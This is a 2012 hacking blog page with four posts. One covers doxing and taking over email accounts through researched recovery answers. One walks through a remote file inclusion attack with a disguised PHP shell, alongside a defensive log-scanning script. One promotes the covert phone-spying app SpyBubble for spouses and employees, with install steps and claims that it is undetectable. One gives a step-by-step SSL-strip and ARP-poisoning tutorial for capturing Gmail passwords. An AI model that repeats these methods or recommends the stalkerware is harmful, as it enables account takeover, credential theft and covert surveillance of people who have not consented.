Monday, April 16, 2012

What Is Doxing? - Hacking Through Doxing And Its Uses... By Anzul Aqueel Soherwardi

First, let me explain what Doxing is. Doxing is the process of gaining information about someone or something by using sources on the Internet and using basic deduction skills. Its name is derived from “Documents” and in short it is the retrieval of “Documents” on a person or company.


You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google, right?” In a sense, yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.


The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flip side, in order to find your email, the hacker has to guess your email, befriend you on Facebook, or hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.


Now, you’re probably thinking, “How’s he going to hack me with just my email?” Well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he gonna guess my recovery question answers?” Well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.

Any hacker reading this who didn't previously know about reverting would probably look at this and say, “This would never work!” But you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.


Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.” 

How can you ensure that you won’t be Doxed? Well, as the Internet becomes more and more useful and addictive, it will become harder to not get Doxed. The main issue for most victims is their security questions and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).


So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?

Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi

Facebook, being the world's largest social networking website, has become a major target for hackers, attackers and other malicious users. Facebook has hired a team of the world's leading security experts to improve its website's security. Moreover, Facebook also pays $500 to anyone who can identify any sort of vulnerability inside Facebook.
The Facebook security team has done a great job of improving Facebook's security and taking it to the maximum level. However, the problem is that Facebook applications are not coded or monitored by Facebook, and it is not possible for Facebook to monitor every single app for vulnerabilities. These Facebook apps are mostly coded by ordinary programmers who are not well aware of how to write code securely. This leaves Facebook apps riddled with common vulnerabilities such as XSS (cross-site scripting), clickjacking, remote file inclusion, etc.

Out of all of these web application vulnerabilities, remote file inclusion (RFI) is a very common web application attack, which occurs because the application does not validate included files. According to Imperva, 21% of the apps on Facebook are vulnerable to remote file inclusion attacks.

Here is how the attack is carried out:

Step 1 - The attacker creates a malicious JPG file, because the upload of PHP files is mostly banned on web servers for users with user-level privileges. The hacker therefore renames a PHP shell to something like shell.php.jpg in order to upload it to the web server.

Step 2 - Next, the hacker exploits the RFI vulnerability to reference the malicious JPG through a parameter, which looks something like this:

.php?page=url of your malicious image

Step 3 - Next the attacker takes control of the server by just going to the url of the JPG image.

Mitigation:

Imperva suggests a four-step mitigation process, which can be found in the image below. However, it includes the deployment of a web application firewall; what if someone is not using a WAF? How will he be protected?
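For a site without a WAF, the two traces the steps above leave in a web server access log can still be checked for: a request parameter whose value points at a remote location, and a file name that hides a PHP extension in front of an image extension. The following is an added example, not code from the original post or from Imperva; the log lines, host names and paths are constructed samples, and the `page` parameter follows the example in Step 2.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Apr/2012:10:01:02 +0000] "GET /app/index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [16/Apr/2012:10:02:10 +0000] "GET /app/uploads/shell.php.jpg HTTP/1.1" 200 87
203.0.113.9 - - [16/Apr/2012:10:02:31 +0000] "GET /app/index.php?page=http%3A%2F%2Ffiles.example%2Fshell.php.jpg HTTP/1.1" 200 40
198.51.100.4 - - [16/Apr/2012:10:05:00 +0000] "GET /app/index.php?page=%252f%252ffiles.example/x HTTP/1.1" 200 40
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with scheme://, data: or //host is a remote reference.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.I)
# A script extension hidden in front of an image extension, e.g. shell.php.jpg.
DOUBLE_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)\.(?:jpe?g|png|gif)$', re.I)

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (%252f -> %2f -> /) so encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text):
    """Return (client, location, reason) tuples for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if DOUBLE_EXT_RE.search(fully_decode(url.path)):
            findings.append((client, "path", "double-extension"))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_RE.match(value):
                findings.append((client, key, "remote-include"))
            if DOUBLE_EXT_RE.search(value):
                findings.append((client, key, "double-extension"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The lasting fix is in the application itself: map the parameter to a fixed list of local files rather than passing it to the include, and store uploads under server-generated names outside any directory that executes scripts.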

How To Spy A Mobile Phone? - CellPhone Spying Software By Anzul Aqueel Soherwardi


Have you ever wanted to spy on your spouse, kids, friends or employees? Or just play ''Secret Service'' 'cause you know, a restraining order can only get you so close?! You certainly are in for a treat. Now, you can play make-believe all you want with software that works just as well.


SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.

SpyBubble has the following features that can be very useful in certain situations:


Call Tracking
1. Access call logs and see how many calls were received and answered on the smartphone, how many calls were made on specific numbers, at what time and the duration they lasted.

SMS Tracking
2. Sent and received messages are saved into your SpyBubble account as they are generated, so you can read them even if they are deleted from the smartphone.

GPS Location Tracking
3. Using SpyBubble you can pinpoint the exact position of the phone (and the person using it) via Google Maps.

Phone Book Access
4. Every phone number saved in the smartphone memory can be viewed through SpyBubble.

Email Tracking
5. Incoming and outgoing emails are saved and can be seen via Email Tracking.

URL Tracking
6. SpyBubble lets you view the user's browsing history.

Photo Tracking
7. All photos sent and received on the phone are logged into SpyBubble website where you can view them.

For a detailed list of the smartphones SpyBubble supports, please click here.

How To Download And Install SpyBubble On A Smartphone:


Step 1. Open the Web Browser on your target phone and type in the following address and press Enter.

http://www.spybubble.com/symbian/sbubble.sis


Step 2. The download process will then start.


Step 3. When prompted to install SpyBubble, click on Yes and then on Continue as shown in the following screenshots.


Step 4. After SpyBubble has been installed, you will see the following screen. Switch the phone off and then on.


Step 5. Register your license key as shown below.
To get your license key, go to: SpyBubble Setting Page (you may have to log into the system first). You can also go to the member control panel and click on the Configuration menu to get it.


Step 6: Log in to SpyBubble Login Panel to verify if your account is working flawlessly.

Irresistible features include:
  • Has GPS tracking.
  • Can spy on text messages.
  • Can get contact book info from phone.
  • Can check out call log.
  • Popular Smart Phones supported.
  • Can be used to back up your own phone’s information.
  • 100% undetectable.
Get your copy of SpyBubble today by Clicking here and let us know if it works for you. Till then,

Cheers! 

Man In The Middle Attack - SSL Hacking By Anzul Aqueel Soherwardi



One of the most successful ways of gaining information such as passwords and user IDs on a LAN (local area network) is through man-in-the-middle (MITM) attacks. I will not go too deep into man-in-the-middle attacks, but in simple words a MITM attack can be explained as an attacker or hacker listening to all the information sent between the client and the server. To prevent these kinds of attacks, email providers started using Hypertext Transfer Protocol Secure (HTTPS). It is a combination of the Hypertext Transfer Protocol (HTTP) with the SSL (Secure Sockets Layer) protocol to provide encrypted communication between the client and the server. So when a hacker carries out a MITM attack, the victim is cautioned with an invalid SSL certificate warning.



In this tutorial I will teach how to carry out a successful MITM attack.

Concept :-

We know that HTTP (Hypertext Transfer Protocol) simply sends all the information in plain text. So if we make the victim use HTTP instead of HTTPS to connect to sites like Gmail and PayPal, we will be able to carry out a successful MITM attack without causing any suspicion. To do this we are going to use a tool called SSL strip.


Things we need

1. SSL strip: You can search Google for SSL strip; it comes in both Windows and Linux versions. I will be using the Windows version in this tutorial.

2. Ettercap, to carry out MITM attacks.

Demonstration :- 

1. Open SSL strip and fill in all the required information for arpspoof, network, SSL strip and change data. If you don’t know what to enter, simply click auto check. Remember to check that HTTPS to HTTP is included in Change data, and finally click OK.

2. Now select the victim’s IP and click open.

3. Now open ettercap, go to sniff - unified sniffing, select your network interface and click OK.

4. Now select hosts - scan hosts. Once scanning is completed, open the host list from the hosts tab. Now select the IP address of the router as target 1 and the victim's IP as target 2.

5. Now select mitm - arp poisoning and click OK as shown.

6. Finally, select start - start sniffing. Now when the victim logs into Gmail he will be using HTTP and not HTTPS. Hence we are able to get the user ID and passwords as shown below.



Countermeasures:

1. Whenever you perform an online transaction such as a credit card payment, bank login or email login, always ensure that you use HTTPS.

2. Always check the SSL certificate before doing an online transaction.